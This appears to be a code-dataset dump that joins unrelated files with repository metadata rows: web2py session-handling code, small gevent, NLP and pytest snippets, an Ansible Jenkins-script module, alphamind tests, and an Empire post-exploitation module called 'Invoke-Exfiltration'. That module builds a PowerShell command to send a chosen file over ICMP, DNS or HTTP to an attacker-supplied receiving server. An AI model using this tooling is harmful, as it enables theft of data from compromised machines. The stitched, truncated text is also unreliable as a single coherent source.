Example: (cache.disk, 60) # caches to disk for 1 minute.
"""
app = current.request.application
# We start by building a files list in which adjacent files internal to
# the application are placed in a list inside the files list.
#
# We will only minify and concat adjacent internal files as there's
# no way to know if changing the order with which the files are apppended
# will break things since the order matters in both CSS and JS and
# internal files may be interleaved with external ones.
files = []
# For the adjacent list we're going to use storage List to both distinguish
# from the regular list and so we can add attributes
internal = List()
internal.has_js = False
internal.has_css = False
done = set() # to remove duplicates
for item in self.files:
if not isinstance(item, list):
if item in done:
continue
done.add(item)
if isinstance(item, (list, tuple)) or not item.startswith('/' + app): # also consider items in other web2py applications to be external
if internal:
files.append(internal)
internal = List()
internal.has_js = False
internal.has_css = False
files.append(item)
continue
if extensions and not item.rpartition('.')[2] in extensions:
continue
internal.append(item)
if item.endswith('.js'):
internal.has_js = True
if item.endswith('.css'):
internal.has_css = True
if internal:
files.append(internal)
# We're done we can now minify
if have_minify:
for i, f in enumerate(files):
if isinstance(f, List) and ((self.optimize_css and f.has_css) or (self.optimize_js and f.has_js)):
# cache for 5 minutes by default
key = hashlib_md5(repr(f)).hexdigest()
cache = self.cache_includes or (current.cache.ram, 60 * 5)
def call_minify(files=f):
return List(minify.minify(files,
URL('static', 'temp'),
current.request.folder,
self.optimize_css,
self.optimize_js))
if cache:
cache_model, time_expire = cache
files[i] = cache_model('response.files.minified/' + key,
call_minify,
time_expire)
else:
files[i] = call_minify()
def static_map(s, item):
if isinstance(item, str):
f = item.lower().split('?')[0]
ext = f.rpartition('.')[2]
# if static_version we need also to check for
# static_version_urls. In that case, the _.x.x.x
# bit would have already been added by the URL()
# function
if self.static_version and not self.static_version_urls:
item = item.replace(
'/static/', '/static/_%s/' % self.static_version, 1)
tmpl = template_mapping.get(ext)
if tmpl:
s.append(tmpl % item)
elif isinstance(item, (list, tuple)):
f = item[0]
tmpl = template_mapping.get(f)
if tmpl:
s.append(tmpl % item[1])
s = []
for item in files:
if isinstance(item, List):
for f in item:
static_map(s, f)
else:
static_map(s, item)
self.write(''.join(s), escape=False)
def stream(self,
stream,
chunk_size=DEFAULT_CHUNK_SIZE,
request=None,
attachment=False,
filename=None
):
"""
If in a controller function::
return response.stream(file, 100)
the file content will be streamed at 100 bytes at the time
Args:
stream: filename or read()able content
chunk_size(int): Buffer size
request: the request object
attachment(bool): prepares the correct headers to download the file
as an attachment. Usually creates a pop-up download window
on browsers
filename(str): the name for the attachment
Note:
for using the stream name (filename) with attachments
the option must be explicitly set as function parameter (will
default to the last request argument otherwise)
"""
headers = self.headers
# for attachment settings and backward compatibility
keys = [item.lower() for item in headers]
if attachment:
# FIXME: should be done like in next download method
if filename is None:
attname = ""
else:
attname = filename
headers["Content-Disposition"] = \
'attachment; filename="%s"' % attname
if not request:
request = current.request
if isinstance(stream, (str, unicodeT)):
stream_file_or_304_or_206(stream,
chunk_size=chunk_size,
request=request,
headers=headers,
status=self.status)
# ## the following is for backward compatibility
if hasattr(stream, 'name'):
filename = stream.name
if filename and 'content-type' not in keys:
headers['Content-Type'] = contenttype(filename)
if filename and 'content-length' not in keys:
try:
headers['Content-Length'] = \
os.path.getsize(filename)
except OSError:
pass
env = request.env
# Internet Explorer < 9.0 will not allow downloads over SSL unless caching is enabled
if request.is_https and isinstance(env.http_user_agent, str) and \
not re.search(r'Opera', env.http_user_agent) and \
re.search(r'MSIE [5-8][^0-9]', env.http_user_agent):
headers['Pragma'] = 'cache'
headers['Cache-Control'] = 'private'
if request and env.web2py_use_wsgi_file_wrapper:
wrapped = env.wsgi_file_wrapper(stream, chunk_size)
else:
wrapped = streamer(stream, chunk_size=chunk_size)
return wrapped
def download(self, request, db, chunk_size=DEFAULT_CHUNK_SIZE, attachment=True, download_filename=None):
"""
Example of usage in controller::
def download():
return response.download(request, db)
Downloads from http://..../download/filename
"""
from pydal.helpers.regex import REGEX_UPLOAD_PATTERN
from pydal.exceptions import NotAuthorizedException, NotFoundException
current.session.forget(current.response)
if not request.args:
raise HTTP(404)
name = request.args[-1]
items = re.match(REGEX_UPLOAD_PATTERN, name)
if not items:
raise HTTP(404)
t = items.group('table'); f = items.group('field')
try:
field = db[t][f]
except (AttributeError, KeyError):
raise HTTP(404)
try:
(filename, stream) = field.retrieve(name, nameonly=True)
except NotAuthorizedException:
raise HTTP(403)
except NotFoundException:
raise HTTP(404)
except IOError:
raise HTTP(404)
headers = self.headers
headers['Content-Type'] = contenttype(name)
if download_filename is None:
download_filename = filename
if attachment:
# Browsers still don't have a simple uniform way to have non ascii
# characters in the filename so for now we are percent encoding it
if isinstance(download_filename, unicodeT):
download_filename = download_filename.encode('utf-8')
download_filename = urllib_quote(download_filename)
headers['Content-Disposition'] = \
'attachment; filename="%s"' % download_filename.replace('"', '\\"')
return self.stream(stream, chunk_size=chunk_size, request=request)
def json(self, data, default=None, indent=None):
if 'Content-Type' not in self.headers:
self.headers['Content-Type'] = 'application/json'
return json(data, default=default or custom_json, indent=indent)
def xmlrpc(self, request, methods):
from gluon.xmlrpc import handler
"""
assuming::
def add(a, b):
return a+b
if a controller function \"func\"::
return response.xmlrpc(request, [add])
the controller will be able to handle xmlrpc requests for
the add function. Example::
import xmlrpclib
connection = xmlrpclib.ServerProxy(
'http://hostname/app/contr/func')
print(connection.add(3, 4))
"""
return handler(request, self, methods)
def toolbar(self):
from gluon.html import DIV, SCRIPT, BEAUTIFY, TAG, A
BUTTON = TAG.button
admin = URL("admin", "default", "design", extension='html',
args=current.request.application)
from gluon.dal import DAL
dbstats = []
dbtables = {}
infos = DAL.get_instances()
for k, v in iteritems(infos):
dbstats.append(TABLE(*[TR(PRE(row[0]), '%.2fms' % (row[1]*1000))
for row in v['dbstats']]))
dbtables[k] = dict(defined=v['dbtables']['defined'] or '[no defined tables]',
lazy=v['dbtables']['lazy'] or '[no lazy tables]')
u = web2py_uuid()
backtotop = A('Back to top', _href="#totop-%s" % u)
# Convert lazy request.vars from property to Storage so they
# will be displayed in the toolbar.
request = copy.copy(current.request)
request.update(vars=current.request.vars,
get_vars=current.request.get_vars,
post_vars=current.request.post_vars)
return DIV(
BUTTON('design', _onclick="document.location='%s'" % admin),
BUTTON('request',
_onclick="jQuery('#request-%s').slideToggle()" % u),
BUTTON('response',
_onclick="jQuery('#response-%s').slideToggle()" % u),
BUTTON('session',
_onclick="jQuery('#session-%s').slideToggle()" % u),
BUTTON('db tables',
_onclick="jQuery('#db-tables-%s').slideToggle()" % u),
BUTTON('db stats',
_onclick="jQuery('#db-stats-%s').slideToggle()" % u),
DIV(BEAUTIFY(request), backtotop,
_class="w2p-toolbar-hidden", _id="request-%s" % u),
DIV(BEAUTIFY(current.session), backtotop,
_class="w2p-toolbar-hidden", _id="session-%s" % u),
DIV(BEAUTIFY(current.response), backtotop,
_class="w2p-toolbar-hidden", _id="response-%s" % u),
DIV(BEAUTIFY(dbtables), backtotop,
_class="w2p-toolbar-hidden", _id="db-tables-%s" % u),
DIV(BEAUTIFY(dbstats), backtotop,
_class="w2p-toolbar-hidden", _id="db-stats-%s" % u),
SCRIPT("jQuery('.w2p-toolbar-hidden').hide()"),
_id="totop-%s" % u
)
class Session(Storage):
"""
Defines the session object and the default values of its members (None)
- session_storage_type : 'file', 'db', or 'cookie'
- session_cookie_compression_level :
- session_cookie_expires : cookie expiration
- session_cookie_key : for encrypted sessions in cookies
- session_id : a number or None if no session
- session_id_name :
- session_locked :
- session_masterapp :
- session_new : a new session obj is being created
- session_hash : hash of the pickled loaded session
- session_pickled : picked session
if session in cookie:
- session_data_name : name of the cookie for session data
if session in db:
- session_db_record_id
- session_db_table
- session_db_unique_key
if session in file:
- session_file
- session_filename
"""
REGEX_SESSION_FILE = r'^(?:[\w-]+/)?[\w.-]+$'
def connect(self,
request=None,
response=None,
db=None,
tablename='web2py_session',
masterapp=None,
migrate=True,
separate=None,
check_client=False,
cookie_key=None,
cookie_expires=None,
compression_level=None
):
"""
Used in models, allows to customize Session handling
Args:
request: the request object
response: the response object
db: to store/retrieve sessions in db (a table is created)
tablename(str): table name
masterapp(str): points to another's app sessions. This enables a
"SSO" environment among apps
migrate: passed to the underlying db
separate: with True, creates a folder with the 2 initials of the
session id. Can also be a function, e.g. ::
separate=lambda(session_name): session_name[-2:]
check_client: if True, sessions can only come from the same ip
cookie_key(str): secret for cookie encryption
cookie_expires: sets the expiration of the cookie
compression_level(int): 0-9, sets zlib compression on the data
before the encryption
"""
request = request or current.request
response = response or current.response
masterapp = masterapp or request.application
cookies = request.cookies
self._unlock(response)
response.session_masterapp = masterapp
response.session_id_name = 'session_id_%s' % masterapp.lower()
response.session_data_name = 'session_data_%s' % masterapp.lower()
response.session_cookie_expires = cookie_expires
response.session_client = str(request.client).replace(':', '.')
current._session_cookie_key = cookie_key
response.session_cookie_compression_level = compression_level
# check if there is a session_id in cookies
try:
old_session_id = cookies[response.session_id_name].value
except KeyError:
old_session_id = None
response.session_id = old_session_id
# if we are supposed to use cookie based session data
if cookie_key:
response.session_storage_type = 'cookie'
elif db:
response.session_storage_type = 'db'
else:
response.session_storage_type = 'file'
# why do we do this?
# because connect may be called twice, by web2py and in models.
# the first time there is no db yet so it should do nothing
if (global_settings.db_sessions is True
or masterapp in global_settings.db_sessions):
return
if response.session_storage_type == 'cookie':
# check if there is session data in cookies
if response.session_data_name in cookies:
session_cookie_data = cookies[response.session_data_name].value
else:
session_cookie_data = None
if session_cookie_data:
data = secure_loads(session_cookie_data, cookie_key,
compression_level=compression_level)
if data:
self.update(data)
response.session_id = True
# else if we are supposed to use file based sessions
elif response.session_storage_type == 'file':
response.session_new = False
response.session_file = None
# check if the session_id points to a valid sesion filename
if response.session_id:
if not re.match(self.REGEX_SESSION_FILE, response.session_id):
response.session_id = None
else:
response.session_filename = \
os.path.join(up(request.folder), masterapp,
'sessions', response.session_id)
try:
response.session_file = \
recfile.open(response.session_filename, 'rb+')
portalocker.lock(response.session_file,
portalocker.LOCK_EX)
response.session_locked = True
self.update(pickle.load(response.session_file))
response.session_file.seek(0)
oc = response.session_filename.split('/')[-1].split('-')[0]
if check_client and response.session_client != oc:
raise Exception("cookie attack")
except:
response.session_id = None
if not response.session_id:
uuid = web2py_uuid()
response.session_id = '%s-%s' % (response.session_client, uuid)
separate = separate and (lambda session_name: session_name[-2:])
if separate:
prefix = separate(response.session_id)
response.session_id = '%s/%s' % (prefix, response.session_id)
response.session_filename = \
os.path.join(up(request.folder), masterapp,
'sessions', response.session_id)
response.session_new = True
# else the session goes in db
elif response.session_storage_type == 'db':
if global_settings.db_sessions is not True:
global_settings.db_sessions.add(masterapp)
# if had a session on file already, close it (yes, can happen)
if response.session_file:
self._close(response)
# if on GAE tickets go also in DB
if settings.global_settings.web2py_runtime_gae:
request.tickets_db = db
if masterapp == request.application:
table_migrate = migrate
else:
table_migrate = False
tname = tablename + '_' + masterapp
table = db.get(tname, None)
Field = db.Field
if table is None:
db.define_table(
tname,
Field('locked', 'boolean', default=False),
Field('client_ip', length=64),
Field('created_datetime', 'datetime',
default=request.now),
Field('modified_datetime', 'datetime'),
Field('unique_key', length=64),
Field('session_data', 'blob'),
migrate=table_migrate,
)
table = db[tname] # to allow for lazy table
response.session_db_table = table
if response.session_id:
# Get session data out of the database
try:
(record_id, unique_key) = response.session_id.split(':')
record_id = long(record_id)
except (TypeError, ValueError):
record_id = None
# Select from database
if record_id:
row = table(record_id, unique_key=unique_key)
# Make sure the session data exists in the database
if row:
# rows[0].update_record(locked=True)
# Unpickle the data
try:
session_data = pickle.loads(row['session_data'])
self.update(session_data)
response.session_new = False
except:
record_id = None
else:
record_id = None
if record_id:
response.session_id = '%s:%s' % (record_id, unique_key)
response.session_db_unique_key = unique_key
response.session_db_record_id = record_id
else:
response.session_id = None
response.session_new = True
# if there is no session id yet, we'll need to create a
# new session
else:
response.session_new = True
# set the cookie now if you know the session_id so user can set
# cookie attributes in controllers/models
# cookie will be reset later
# yet cookie may be reset later
# Removed comparison between old and new session ids - should send
# the cookie all the time
if isinstance(response.session_id, str):
response.cookies[response.session_id_name] = response.session_id
response.cookies[response.session_id_name]['path'] = '/'
if cookie_expires:
response.cookies[response.session_id_name]['expires'] = \
cookie_expires.strftime(FMT)
session_pickled = pickle.dumps(self, pickle.HIGHEST_PROTOCOL)
response.session_hash = hashlib.md5(session_pickled).hexdigest()
if self.flash:
(response.flash, self.flash) = (self.flash, None)
def renew(self, clear_session=False):
if clear_session:
self.clear()
request = current.request
response = current.response
session = response.session
masterapp = response.session_masterapp
cookies = request.cookies
if response.session_storage_type == 'cookie':
return
# if the session goes in file
if response.session_storage_type == 'file':
self._close(response)
uuid = web2py_uuid()
response.session_id = '%s-%s' % (response.session_client, uuid)
separate = (lambda s: s[-2:]) if session and response.session_id[2:3] == "/" else None
if separate:
prefix = separate(response.session_id)
response.session_id = '%s/%s' % \
(prefix, response.session_id)
response.session_filename = \
os.path.join(up(request.folder), masterapp,
'sessions', response.session_id)
response.session_new = True
# else the session goes in db
elif response.session_storage_type == 'db':
table = response.session_db_table
# verify that session_id exists
if response.session_file:
self._close(response)
if response.session_new:
return
# Get session data out of the database
if response.session_id is None:
return
(record_id, sep, unique_key) = response.session_id.partition(':')
if record_id.isdigit() and long(record_id) > 0:
new_unique_key = web2py_uuid()
row = table(record_id)
if row and to_native(row['unique_key']) == to_native(unique_key):
table._db(table.id == record_id).update(unique_key=new_unique_key)
else:
record_id = None
if record_id:
response.session_id = '%s:%s' % (record_id, new_unique_key)
response.session_db_record_id = record_id
response.session_db_unique_key = new_unique_key
else:
response.session_new = True
def _fixup_before_save(self):
response = current.response
rcookies = response.cookies
scookies = rcookies.get(response.session_id_name)
if not scookies:
return
if self._forget:
del rcookies[response.session_id_name]
return
if self.get('httponly_cookies', True):
scookies['HttpOnly'] = True
if self._secure:
scookies['secure'] = True
if self._same_site is None:
# Using SameSite Lax Mode is the default
# You actually have to call session.samesite(False) if you really
# dont want the extra protection provided by the SameSite header
self._same_site = 'Lax'
if self._same_site:
if 'samesite' not in Cookie.Morsel._reserved:
# Python version 3.7 and lower needs this
Cookie.Morsel._reserved['samesite'] = 'SameSite'
scookies['samesite'] = self._same_site
def clear_session_cookies(self):
request = current.request
response = current.response
session = response.session
masterapp = response.session_masterapp
cookies = request.cookies
rcookies = response.cookies
# if not cookie_key, but session_data_name in cookies
# expire session_data_name from cookies
if response.session_data_name in cookies:
rcookies[response.session_data_name] = 'expired'
rcookies[response.session_data_name]['path'] = '/'
rcookies[response.session_data_name]['expires'] = PAST
if response.session_id_name in rcookies:
del rcookies[response.session_id_name]
def save_session_id_cookie(self):
request = current.request
response = current.response
session = response.session
masterapp = response.session_masterapp
cookies = request.cookies
rcookies = response.cookies
# if not cookie_key, but session_data_name in cookies
# expire session_data_name from cookies
if not current._session_cookie_key:
if response.session_data_name in cookies:
rcookies[response.session_data_name] = 'expired'
rcookies[response.session_data_name]['path'] = '/'
rcookies[response.session_data_name]['expires'] = PAST
if response.session_id:
rcookies[response.session_id_name] = response.session_id
rcookies[response.session_id_name]['path'] = '/'
expires = response.session_cookie_expires
if isinstance(expires, datetime.datetime):
expires = expires.strftime(FMT)
if expires:
rcookies[response.session_id_name]['expires'] = expires
def clear(self):
# see https://github.com/web2py/web2py/issues/735
response = current.response
if response.session_storage_type == 'file':
target = recfile.generate(response.session_filename)
try:
self._close(response)
os.unlink(target)
except:
pass
elif response.session_storage_type == 'db':
table = response.session_db_table
if response.session_id:
(record_id, sep, unique_key) = response.session_id.partition(':')
if record_id.isdigit() and long(record_id) > 0:
table._db(table.id == record_id).delete()
Storage.clear(self)
def is_new(self):
if self._start_timestamp:
return False
else:
self._start_timestamp = datetime.datetime.today()
return True
def is_expired(self, seconds=3600):
now = datetime.datetime.today()
if not self._last_timestamp or \
self._last_timestamp + datetime.timedelta(seconds=seconds) > now:
self._last_timestamp = now
return False
else:
return True
def secure(self):
self._secure = True
def samesite(self, mode='Lax'):
self._same_site = mode
def forget(self, response=None):
self._close(response)
self._forget = True
def _try_store_in_cookie(self, request, response):
if self._forget or self._unchanged(response):
# self.clear_session_cookies()
self.save_session_id_cookie()
return False
name = response.session_data_name
compression_level = response.session_cookie_compression_level
value = secure_dumps(dict(self),
current._session_cookie_key,
compression_level=compression_level)
rcookies = response.cookies
rcookies.pop(name, None)
rcookies[name] = to_native(value)
rcookies[name]['path'] = '/'
expires = response.session_cookie_expires
if isinstance(expires, datetime.datetime):
expires = expires.strftime(FMT)
if expires:
rcookies[name]['expires'] = expires
return True
def _unchanged(self, response):
if response.session_new:
internal = ['_last_timestamp', '_secure', '_start_timestamp', '_same_site']
for item in self.keys():
if item not in internal:
return False
return True
session_pickled = pickle.dumps(self, pickle.HIGHEST_PROTOCOL)
response.session_pickled = session_pickled
session_hash = hashlib.md5(session_pickled).hexdigest()
return response.session_hash == session_hash
def _try_store_in_db(self, request, response):
# don't save if file-based sessions,
# no session id, or session being forgotten
# or no changes to session (Unless the session is new)
if (not response.session_db_table
or self._forget
or (self._unchanged(response) and not response.session_new)):
if (not response.session_db_table
and global_settings.db_sessions is not True
and response.session_masterapp in global_settings.db_sessions):
global_settings.db_sessions.remove(response.session_masterapp)
# self.clear_session_cookies()
self.save_session_id_cookie()
return False
table = response.session_db_table
record_id = response.session_db_record_id
if response.session_new:
unique_key = web2py_uuid()
else:
unique_key = response.session_db_unique_key
session_pickled = response.session_pickled or pickle.dumps(self, pickle.HIGHEST_PROTOCOL)
dd = dict(locked=0,
client_ip=response.session_client,
modified_datetime=request.now.isoformat(),
session_data=session_pickled,
unique_key=unique_key)
if record_id:
if not table._db(table.id == record_id).update(**dd):
record_id = None
if not record_id:
record_id = table.insert(**dd)
response.session_id = '%s:%s' % (record_id, unique_key)
response.session_db_unique_key = unique_key
response.session_db_record_id = record_id
self.save_session_id_cookie()
return True
def _try_store_in_cookie_or_file(self, request, response):
if response.session_storage_type == 'file':
return self._try_store_in_file(request, response)
if response.session_storage_type == 'cookie':
return self._try_store_in_cookie(request, response)
def _try_store_in_file(self, request, response):
try:
if (not response.session_id or
not response.session_filename or
self._forget
or self._unchanged(response)):
# self.clear_session_cookies()
return False
else:
if response.session_new or not response.session_file:
# Tests if the session sub-folder exists, if not, create it
session_folder = os.path.dirname(response.session_filename)
if not os.path.exists(session_folder):
os.mkdir(session_folder)
response.session_file = recfile.open(response.session_filename, 'wb')
portalocker.lock(response.session_file, portalocker.LOCK_EX)
response.session_locked = True
if response.session_file:
session_pickled = response.session_pickled or pickle.dumps(self, pickle.HIGHEST_PROTOCOL)
response.session_file.write(session_pickled)
response.session_file.truncate()
return True
finally:
self._close(response)
self.save_session_id_cookie()
def _unlock(self, response):
if response and response.session_file and response.session_locked:
try:
portalocker.unlock(response.session_file)
response.session_locked = False
except: # this should never happen but happens in Windows
pass
def _close(self, response):
if response and response.session_file:
self._unlock(response)
try:
response.session_file.close()
del response.session_file
except:
pass
def pickle_session(s):
return Session, (dict(s),)
copyreg.pickle(Session, pickle_session)
| [
"[email protected]"
] | |
09e8055fcdcf2ad2dec55459c099ab811ed32068 | fffabb9f3025e89f7d1e71e2bea1e1f93ca95c98 | /gevent_-master/monkey_test.py | ca9512a34827effed846c0722e796fa03555f070 | [] | no_license | kagxin/recipe | 2a880b77e56bae25e9793b13a8ebdeeea19b716c | 70af9c949b9e4b476585b2b650fba416a9d3ebb2 | refs/heads/master | 2021-09-11T18:58:46.295928 | 2018-04-11T03:11:05 | 2018-04-11T03:11:05 | 86,281,134 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | import gevent.monkey
gevent.monkey.patch_socket()
import gevent
import urllib
import json
def fetch(pid):
pass
fetch()
| [
"[email protected]"
] | |
8ada0608c934b48b2abbcdeb5aa1350a01506751 | 0a004fc3fe8e36fd7ce0ed2cc7e8140982315e03 | /supervised_learning/0x0F-word_embeddings/0-bag_of_words.py | 58f174f5ee6192922d3b2ccf12ba7882281f6654 | [] | no_license | pafuentess/holbertonschool-machine_learning | 266ed4f05e106e194cdafe39544e48904f6538f4 | 3bffd1391b3fc790f0137d0afbe90eb8e2f7d713 | refs/heads/master | 2023-03-26T15:12:14.721409 | 2021-03-20T20:28:15 | 2021-03-20T20:28:15 | 279,388,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 455 | py | #!/usr/bin/env python3
""" doc """
from sklearn.feature_extraction.text import CountVectorizer
def bag_of_words(sentences, vocab=None):
""" doc """
if vocab is None:
vectorizer = CountVectorizer()
X = vectorizer.fit_transform(sentences)
vocab = vectorizer.get_feature_names()
else:
vectorizer = CountVectorizer(vocabulary=vocab)
X = vectorizer.fit_transform(sentences)
return X.toarray(), vocab
| [
"[email protected]"
] | |
d132455b70c174d99968af7351962cf9ba6070a0 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-1/30cae1c356d7341ef3c3a049b435b2da9bbd5588-<main>-bug.py | 1207a332ae96f47a64d09b9b87303bc66e73535b | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,799 | py |
def main():
module = AnsibleModule(argument_spec=dict(script=dict(required=True, type='str'), url=dict(required=False, type='str', default='http://localhost:8080'), validate_certs=dict(required=False, type='bool', default=True), user=dict(required=False, no_log=True, type='str', default=None), password=dict(required=False, no_log=True, type='str', default=None), timeout=dict(required=False, type='int', default=10), args=dict(required=False, type='dict', default=None)))
if (module.params['user'] is not None):
if (module.params['password'] is None):
module.fail_json(msg='password required when user provided')
module.params['url_username'] = module.params['user']
module.params['url_password'] = module.params['password']
module.params['force_basic_auth'] = True
if (module.params['args'] is not None):
from string import Template
script_contents = Template(module.params['script']).substitute(module.params['args'])
else:
script_contents = module.params['script']
headers = {
}
if is_csrf_protection_enabled(module):
crumb = get_crumb(module)
headers = {
crumb['crumbRequestField']: crumb['crumb'],
}
(resp, info) = fetch_url(module, (module.params['url'] + '/scriptText'), data=urlencode({
'script': script_contents,
}), headers=headers, method='POST', timeout=module.params['timeout'])
if (info['status'] != 200):
module.fail_json(msg=((('HTTP error ' + str(info['status'])) + ' ') + info['msg']))
result = to_native(resp.read())
if (('Exception:' in result) and ('at java.lang.Thread' in result)):
module.fail_json(msg=('script failed with stacktrace:\n ' + result))
module.exit_json(output=result)
| [
"[email protected]"
] | |
26724562ddaf5b84d3514df2553cf578c11097ff | e262e64415335060868e9f7f73ab8701e3be2f7b | /.history/pytest_test_20201123174255.py | 71d84ac3ea86d52edcf7b63ed99b1d05e2cfeaed | [] | no_license | Allison001/developer_test | 6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63 | b8e04b4b248b0c10a35e93128a5323165990052c | refs/heads/master | 2023-06-18T08:46:40.202383 | 2021-07-23T03:31:54 | 2021-07-23T03:31:54 | 322,807,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | import pytest
class Test_A:
@pytest.mark.parametrize('a,b',[(10,20),(5,5)])
def test_data1(self,a,b):
print(a + b)
def test_data2(self):
a = 5
b = 5
print(a+b)
if __name__ == '__main__':
pytest.main
| [
"[email protected]"
] | |
81031853fd92e573bbec0a772457ebba3f43bb7a | e229456b9effa99e906d5cdfe08200ca5e1920a4 | /lib/modules/exfiltration/invoke-exfiltration.py | b64b4fe4bcca83a42b5941dd3559df04ae7ff47c | [
"BSD-3-Clause"
] | permissive | nerbix/Empire | cff3620f589d38a4967737458b7f4b56acabd64c | f45d5f35ff459df22ef0bd55236b7ffd9cef6f45 | refs/heads/master | 2020-05-22T09:27:59.693741 | 2017-03-08T18:18:13 | 2017-03-08T18:18:13 | 84,344,747 | 0 | 0 | null | 2017-03-08T16:54:42 | 2017-03-08T16:54:42 | null | UTF-8 | Python | false | false | 4,857 | py | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Invoke-Exfiltration',
# list of one or more authors for the module
'Author': ['Nick Britton <[email protected]>'],
# more verbose multi-line description of the module
'Description': ('This module will exfiltration data over a range of protocols'),
# True if the module needs to run in the background
'Background' : True,
# File extension to save the file as
'OutputExtension' : None,
# True if the module needs admin rights to run
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
# Disabled - this can be a relatively noisy module but sometimes useful
'OpsecSafe' : False,
# The minimum PowerShell version needed for the module to run
'MinPSVersion' : '2',
# list of any references/other comments
'Comments': [
'Based heavily on the great work done by Sensepost here: http://github.com/sensepost/det'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to generate the source traffic on',
'Required' : True,
'Value' : ''
},
'server' : {
'Description' : 'Receiving Server IP',
'Required' : True,
'Value' : ''
},
'type' : {
'Description' : 'The protocol to use (ICMP, DNS, HTTP)',
'Required' : True,
'Value' : 'ICMP'
},
'key' : {
'Description' : 'AES encryption key to use',
'Required' : True,
'Value' : 'HELLO123'
},
'file' : {
'Description' : 'Full path of file to exfiltrate',
'Required' : True,
'Value' : ''
},
'port' : {
'Description' : 'Port (for HTTP exfiltration only).',
'Required' : False,
'Value' : '8080'
},
'dns' : {
'Description' : 'DNS Server to you (for DNS exfiltration only).',
'Required' : False,
'Value' : 'google.com'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exfil/Invoke-Exfiltration.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# Need to actually run the module that has been loaded
script += 'Invoke-Exfiltration'
# add any arguments to the end execution of the script
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " \"" + str(values['Value']) + "\""
return script
| [
"[email protected]"
] | |
afb957284892edf8fcd63b07feef00c82584970b | 4a7ca643f2bb681a14105fdfba2b696c14f8fb19 | /alphamind/tests/analysis/test_quantilieanalysis.py | fd31eaf64d67c0a4e71bef2c786c696b2e91e3ae | [
"MIT"
] | permissive | iLampard/alpha-mind | 84bb490eaa515a147b2a31deff305b2e6423c76f | c99ba7b2b082d7bf07263fde0cca57b1a8bcb7de | refs/heads/master | 2020-03-22T02:32:28.489547 | 2018-08-22T03:01:26 | 2018-08-22T03:01:26 | 126,668,894 | 0 | 0 | MIT | 2018-06-26T03:37:20 | 2018-03-25T05:53:51 | Python | UTF-8 | Python | false | false | 3,087 | py | # -*- coding: utf-8 -*-
"""
Created on 2017-8-16
@author: cheng.li
"""
import unittest
import numpy as np
import pandas as pd
from alphamind.analysis.quantileanalysis import er_quantile_analysis
from alphamind.analysis.quantileanalysis import quantile_analysis
from alphamind.data.processing import factor_processing
from alphamind.data.standardize import standardize
from alphamind.data.winsorize import winsorize_normal
from alphamind.data.quantile import quantile
class TestQuantileAnalysis(unittest.TestCase):
def setUp(self):
n = 5000
n_f = 5
self.x = np.random.randn(n, 5)
self.x_w = np.random.randn(n_f)
self.r = np.random.randn(n)
self.b_w = np.random.randint(0, 10, n)
self.b_w = self.b_w / float(self.b_w.sum())
self.risk_exp = np.random.randn(n, 3)
self.n_bins = 10
def test_q_anl_impl(self):
n_bins = 5
x = self.x[:, 0]
q_groups = quantile(x, n_bins)
s = pd.Series(self.r, index=q_groups)
grouped_return = s.groupby(level=0).mean().values.flatten()
expected_res = grouped_return.copy()
res = n_bins - 1
res_weight = 1. / res
for i, value in enumerate(expected_res):
expected_res[i] = (1. + res_weight) * value - res_weight * grouped_return.sum()
calculated_res = er_quantile_analysis(x, n_bins, self.r)
np.testing.assert_array_almost_equal(expected_res, calculated_res)
def test_quantile_analysis_simple(self):
f_df = pd.DataFrame(self.x)
calculated = quantile_analysis(f_df,
self.x_w,
self.r,
n_bins=self.n_bins,
do_neutralize=False,
pre_process=[],
post_process=[])
er = self.x_w @ self.x.T
expected = er_quantile_analysis(er, self.n_bins, self.r)
np.testing.assert_array_almost_equal(calculated, expected)
def test_quantile_analysis_with_factor_processing(self):
f_df = pd.DataFrame(self.x)
calculated = quantile_analysis(f_df,
self.x_w,
self.r,
n_bins=self.n_bins,
do_neutralize=True,
risk_exp=self.risk_exp,
pre_process=[winsorize_normal, standardize],
post_process=[standardize])
er = self.x_w @ factor_processing(self.x,
[winsorize_normal, standardize],
self.risk_exp,
[standardize]).T
expected = er_quantile_analysis(er, self.n_bins, self.r)
np.testing.assert_array_almost_equal(calculated, expected)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
b2b72af5d662ec2cf1cd5c51918723e1513fc6d5 | a838d4bed14d5df5314000b41f8318c4ebe0974e | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_11_01/aio/operations/_network_interface_ip_configurations_operations.py | 0441579f380976233a87e4c8a79c2311179a4ecd | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
